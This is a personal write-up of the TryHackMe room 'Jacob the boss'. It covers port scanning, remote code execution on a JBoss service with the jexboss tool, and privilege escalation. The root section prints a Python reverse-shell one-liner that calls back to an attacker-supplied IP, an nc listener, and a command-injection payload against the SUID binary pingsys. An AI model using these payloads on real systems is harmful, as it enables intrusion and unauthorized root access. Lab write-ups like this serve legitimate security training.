Tryhackme Jacob the boss

My solution to the Jacob the boss room on Tryhackme



User Flag

I ran the usual start to a ctf. Masscan followed by nmap.

Off the bat all I see port 80 for a web server and 22 for ssh. Seeing so many open ports for an ip I assumed it must be a windows box turned out to be a linux box.

As nmap began I started to check anonymous login worked on the ssh port. Didn’t work so I began on the web server.

I started nikto which gave nothing eventually. Using ZAP and dirbuster I tried to go through this DotClear Blog website.

I got an admin/auth.php page I tried to run a brute on the authentication which didn’t work, tried sqlmap on it which also didn’t work. Searching for DotClear exploits there’s a xss one but that only works post admin login. The entire website was pretty bare, one example post nothing really so I went back to the nmap scan.

Thats when I noticed 8080 as another http server and the jboss service. Given the name of the box this had to be the way in. In hindsight I should have seen the jboss tag on the tryhackme room.

This seems like a basic info page so I checked online for exploits. I found an RCE(Remote Code Execution) for the jboss service.

I could do this manually but the article links to a tool to do so which I get at github(joaomatos/jexboss).

Now if you go through the exploit you see that it’s a RCE not a shell even though there is a prompt shell>

id reveals the user jacob. You can use this to get the user flag located at /home/jacob/user.txt

Root Flag

Now to do privesc I sent a reverse shell. On my system opened a 1234 port to accept the shell.

nc -lvp 1234

I use pentest monkey as a cheat sheet for cheat sheets for reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP-tun0-Enter-here",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);'

Running this in the RCE gives us a shell.

This is where I got stuck. I used linpeas for enumeration.

It didn’t give me anything that worked, it uses a system of color coding how likely a portion of enumeration would be effective in privilege escalation. It highlighted a java binary but that has jacob as the owner so no privesc. I tried another script which suggested mysql but that didn’t have root privileges either. No kernel exploit. I began deep diving into SUID binaries none stood out but I tried all.

If you don’t know how suid based privesc works take a look at the link below.

Crontab was useless cause PATH couldn’t be modified and there were no scheduled tasks where jacob had write privileges. pkexec had been updated past the version that allowed for privesc. I couldn’t find anything so I began checking all the suid binaries. I got a hit on pingsys.

/usr/bin/pingsys '; /bin/sh'

Now get the root flag.

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